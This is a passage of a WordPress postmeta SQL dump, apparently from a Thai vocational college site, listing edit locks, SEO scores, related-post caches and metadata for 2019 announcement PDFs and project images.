(14972, 6332, '_hide_featured', NULL),
(14973, 6332, '_yoast_wpseo_content_score', '60'),
(14974, 6332, '_yoast_wpseo_primary_category', '31'),
(14975, 6332, '_wpas_done_all', '1'),
(14978, 6334, '_edit_lock', '1574303447:14'),
(14979, 6334, '_edit_last', '14'),
(14980, 6334, '_thumbnail_id', '6286'),
(14984, 6334, '_hide_featured', NULL),
(14985, 6334, '_yoast_wpseo_content_score', '60'),
(14986, 6334, '_yoast_wpseo_primary_category', '31'),
(14987, 6334, '_wpas_done_all', '1'),
(14992, 6332, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575626746;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5822;}i:1;a:1:{s:2:\"id\";i:5926;}i:2;a:1:{s:2:\"id\";i:4899;}}}}'),
(14993, 6334, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575652644;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6138;}i:1;a:1:{s:2:\"id\";i:6136;}i:2;a:1:{s:2:\"id\";i:5381;}}}}'),
(14994, 6324, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575664795;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5671;}i:1;a:1:{s:2:\"id\";i:6176;}i:2;a:1:{s:2:\"id\";i:6326;}}}}'),
(14995, 6322, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574845696;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5194;}i:1;a:1:{s:2:\"id\";i:5169;}i:2;a:1:{s:2:\"id\";i:5936;}}}}'),
(14996, 6330, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575736675;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4029;}i:1;a:1:{s:2:\"id\";i:4742;}i:2;a:1:{s:2:\"id\";i:4711;}}}}'),
(14997, 6328, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575692591;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5822;}i:1;a:1:{s:2:\"id\";i:6312;}i:2;a:1:{s:2:\"id\";i:5147;}}}}'),
(14998, 6316, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575720716;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5962;}i:1;a:1:{s:2:\"id\";i:3988;}i:2;a:1:{s:2:\"id\";i:5948;}}}}'),
(14999, 6318, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575573213;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6119;}i:1;a:1:{s:2:\"id\";i:5026;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(15000, 6320, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575478804;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4182;}i:1;a:1:{s:2:\"id\";i:4026;}i:2;a:1:{s:2:\"id\";i:4098;}}}}'),
(15024, 6326, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575428916;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4872;}i:1;a:1:{s:2:\"id\";i:4986;}i:2;a:1:{s:2:\"id\";i:5477;}}}}'),
(15025, 6339, '_edit_lock', '1574910934:14'),
(15026, 6339, '_edit_last', '14'),
(15027, 6340, '_wp_attached_file', '2019/11/นักศึกษา-2562.pdf'),
(15028, 6339, '_hide_featured', NULL),
(15029, 6339, '_yoast_wpseo_content_score', '60'),
(15030, 6344, '_edit_lock', '1574934035:14'),
(15031, 6345, '_wp_attached_file', '2019/11/ประกาศรับสมัครครูอัตราจ้าง-คอมฯ.pdf'),
(15032, 6346, '_wp_attached_file', '2019/11/ประกาศรายชื่อครูอัตราจ้าง-ก่อสร้าง.pdf'),
(15033, 6344, '_edit_last', '14'),
(15037, 6344, '_hide_featured', NULL),
(15038, 6344, '_yoast_wpseo_content_score', '60'),
(15039, 6344, '_yoast_wpseo_primary_category', '3'),
(15040, 6344, '_wpas_done_all', '1'),
(15043, 6344, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575553980;s:7:\"payload\";a:0:{}}}'),
(15044, 6349, '_wp_attached_file', '2019/11/ประกาศรายชื่อครูอัตราจ้าง-ก่อสร้าง-1.pdf'),
(15045, 6348, '_edit_lock', '1574937069:14'),
(15046, 6348, '_edit_last', '14'),
(15050, 6348, '_hide_featured', NULL),
(15051, 6348, '_yoast_wpseo_content_score', '60'),
(15052, 6348, '_yoast_wpseo_primary_category', '3'),
(15053, 6348, '_wpas_done_all', '1'),
(15056, 6348, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575644401;s:7:\"payload\";a:0:{}}}'),
(15057, 6352, '_wp_attached_file', '2019/11/2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ.jpg'),
(15058, 6352, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:153:\"2019/11/2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:153:\"2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:153:\"2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:154:\"2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:154:\"2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:153:\"2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15059, 6353, '_wp_attached_file', '2019/11/4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข.jpg'),
(15060, 6353, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:158:\"2019/11/4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:158:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:158:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:159:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:159:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:158:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15063, 6355, '_wp_attached_file', '2019/11/9-โครงการสร้างผู้ประกอบการใหม่.jpg'),
(15064, 6355, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:98:\"2019/11/9-โครงการสร้างผู้ประกอบการใหม่.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:98:\"9-โครงการสร้างผู้ประกอบการใหม่-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:98:\"9-โครงการสร้างผู้ประกอบการใหม่-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:99:\"9-โครงการสร้างผู้ประกอบการใหม่-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:99:\"9-โครงการสร้างผู้ประกอบการใหม่-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:98:\"9-โครงการสร้างผู้ประกอบการใหม่-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15065, 6356, '_wp_attached_file', '2019/11/14-โครงการเชิญวิทยากรบรรยายพิเศษ.jpg'),
(15066, 6356, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:102:\"2019/11/14-โครงการเชิญวิทยากรบรรยายพิเศษ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:102:\"14-โครงการเชิญวิทยากรบรรยายพิเศษ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:102:\"14-โครงการเชิญวิทยากรบรรยายพิเศษ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:103:\"14-โครงการเชิญวิทยากรบรรยายพิเศษ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:103:\"14-โครงการเชิญวิทยากรบรรยายพิเศษ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:102:\"14-โครงการเชิญวิทยากรบรรยายพิเศษ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15067, 6357, '_wp_attached_file', '2019/11/19-โครงการประกวดร้องเพลง.jpg'),
(15068, 6357, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:78:\"2019/11/19-โครงการประกวดร้องเพลง.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:78:\"19-โครงการประกวดร้องเพลง-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:78:\"19-โครงการประกวดร้องเพลง-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:79:\"19-โครงการประกวดร้องเพลง-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:79:\"19-โครงการประกวดร้องเพลง-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:78:\"19-โครงการประกวดร้องเพลง-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15069, 6358, '_wp_attached_file', '2019/11/20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์.jpg'),
(15070, 6358, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:111:\"2019/11/20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:111:\"20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:111:\"20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:112:\"20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:112:\"20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:111:\"20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15071, 6359, '_wp_attached_file', '2019/11/23-โครงการออมทรัพย์กับธนาคารโรงเรียน.jpg'),
(15072, 6359, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:114:\"2019/11/23-โครงการออมทรัพย์กับธนาคารโรงเรียน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:114:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:114:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:115:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:115:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:114:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15073, 6360, '_wp_attached_file', '2019/11/27.-โครงการทัศนศึกษา-ท่องเที่ยว-.jpg'),
(15074, 6360, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:96:\"2019/11/27.-โครงการทัศนศึกษา-ท่องเที่ยว-.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:96:\"27.-โครงการทัศนศึกษา-ท่องเที่ยว--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:96:\"27.-โครงการทัศนศึกษา-ท่องเที่ยว--212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:97:\"27.-โครงการทัศนศึกษา-ท่องเที่ยว--768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:97:\"27.-โครงการทัศนศึกษา-ท่องเที่ยว--724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:96:\"27.-โครงการทัศนศึกษา-ท่องเที่ยว--212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15075, 6361, '_wp_attached_file', '2019/11/เปิดประชุมอวท.jpg'),
(15076, 6361, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:51:\"2019/11/เปิดประชุมอวท.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"เปิดประชุมอวท-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:51:\"เปิดประชุมอวท-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:51:\"เปิดประชุมอวท-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:52:\"เปิดประชุมอวท-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:51:\"เปิดประชุมอวท-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15077, 6362, '_wp_attached_file', '2019/11/เลขที่-13-โครงการอบรมมัคคุเทศก์.jpg'),
(15078, 6362, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:97:\"2019/11/เลขที่-13-โครงการอบรมมัคคุเทศก์.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:97:\"เลขที่-13-โครงการอบรมมัคคุเทศก์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:97:\"เลขที่-13-โครงการอบรมมัคคุเทศก์-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:98:\"เลขที่-13-โครงการอบรมมัคคุเทศก์-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:98:\"เลขที่-13-โครงการอบรมมัคคุเทศก์-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:97:\"เลขที่-13-โครงการอบรมมัคคุเทศก์-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15079, 6363, '_wp_attached_file', '2019/11/โครงการเสริมสร้างบุคลิกภาพฯ.jpg'),
(15080, 6363, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1240;s:6:\"height\";i:1754;s:4:\"file\";s:93:\"2019/11/โครงการเสริมสร้างบุคลิกภาพฯ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:93:\"โครงการเสริมสร้างบุคลิกภาพฯ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:93:\"โครงการเสริมสร้างบุคลิกภาพฯ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:94:\"โครงการเสริมสร้างบุคลิกภาพฯ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:94:\"โครงการเสริมสร้างบุคลิกภาพฯ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:93:\"โครงการเสริมสร้างบุคลิกภาพฯ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15081, 6364, '_wp_attached_file', '2019/11/โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd.jpg'),
(15082, 6364, '_wp_attachment_metadata', 